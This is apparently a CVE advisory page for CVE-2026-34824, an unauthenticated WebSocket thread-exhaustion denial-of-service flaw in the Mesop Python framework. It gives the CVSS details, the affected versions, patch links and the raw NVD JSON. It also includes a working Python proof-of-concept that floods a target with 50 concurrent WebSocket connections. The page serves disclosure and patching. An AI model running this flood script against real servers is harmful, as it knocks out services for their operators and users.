Security Vulnerability Report
CVE-2026-34824 CVSS 7.5 HIGH

Published: 2026-04-03 23:17:05
Last Modified: 2026-04-13 17:28:47

Description

Mesop is a Python-based UI framework that allows users to build web applications. From version 1.2.3 to before version 1.2.5, an uncontrolled resource consumption vulnerability exists in the WebSocket implementation of the Mesop framework. An unauthenticated attacker can send a rapid succession of WebSocket messages, forcing the server to spawn an unbounded number of operating system threads. This leads to thread exhaustion and Out of Memory (OOM) errors, causing a complete Denial of Service (DoS) for any application built on the framework. This issue has been patched in version 1.2.5.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:mesop-dev:mesop:*:*:*:*:*:python:*:* - VULNERABLE
Mesop >= 1.2.3, < 1.2.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import asyncio
import websockets


async def dos_exploit(target_uri):
    try:
        # Establish WebSocket connection
        async with websockets.connect(target_uri) as websocket:
            print(f"Connected to {target_uri}, starting flood...")
            while True:
                # Send rapid messages to trigger unbounded thread spawning
                try:
                    await websocket.send("payload_trigger")
                except Exception as e:
                    print(f"Send error: {e}")
                    break
    except Exception as e:
        print(f"Connection error: {e}")


if __name__ == "__main__":
    target = "ws://127.0.0.1:8080/ws"  # Replace with actual target
    # Launch multiple tasks to accelerate resource exhaustion
    loop = asyncio.get_event_loop()
    tasks = [dos_exploit(target) for _ in range(50)]
    loop.run_until_complete(asyncio.gather(*tasks))

References

https://github.com/mesop-dev/mesop/commit/760a2079b5c609038c826d24dfbcf9b0be98d987 (Patch)
https://github.com/mesop-dev/mesop/releases/tag/v1.2.5 (Product, Release Notes)
https://github.com/mesop-dev/mesop/security/advisories/GHSA-3jr7-6hqp-x679 (Exploit, Mitigation, Vendor Advisory)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-34824",
    "sourceIdentifier": "[email protected]",
    "published": "2026-04-03T23:17:05.213",
    "lastModified": "2026-04-13T17:28:47.427",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Mesop is a Python-based UI framework that allows users to build web applications. From version 1.2.3 to before version 1.2.5, an uncontrolled resource consumption vulnerability exists in the WebSocket implementation of the Mesop framework. An unauthenticated attacker can send a rapid succession of WebSocket messages, forcing the server to spawn an unbounded number of operating system threads. This leads to thread exhaustion and Out of Memory (OOM) errors, causing a complete Denial of Service (DoS) for any application built on the framework. This issue has been patched in version 1.2.5."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {"lang": "en", "value": "CWE-125"}
        ]
      },
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {"lang": "en", "value": "CWE-770"}
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:mesop-dev:mesop:*:*:*:*:*:python:*:*",
                "versionStartIncluding": "1.2.3",
                "versionEndExcluding": "1.2.5",
                "matchCriteriaId": "4769E8D1-F88C-4A75-8FAF-134F1A0B7DE0"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/mesop-dev/mesop/commit/760a2079b5c609038c826d24dfbcf9b0be98d987",
        "source": "[email protected]",
        "tags": ["Patch"]
      },
      {
        "url": "https://github.com/mesop-dev/mesop/releases/tag/v1.2.5",
        "source": "[email protected]",
        "tags": ["Product", "Release Notes"]
      },
      {
        "url": "https://github.com/mesop-dev/mesop/security/advisories/GHSA-3jr7-6hqp-x679",
        "source": "[email protected]",
        "tags": ["Exploit", "Mitigation", "Vendor Advisory"]
      },
      {
        "url": "https://github.com/mesop-dev/mesop/security/advisories/GHSA-3jr7-6hqp-x679",
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "tags": ["Exploit", "Mitigation", "Vendor Advisory"]
      }
    ]
  }
}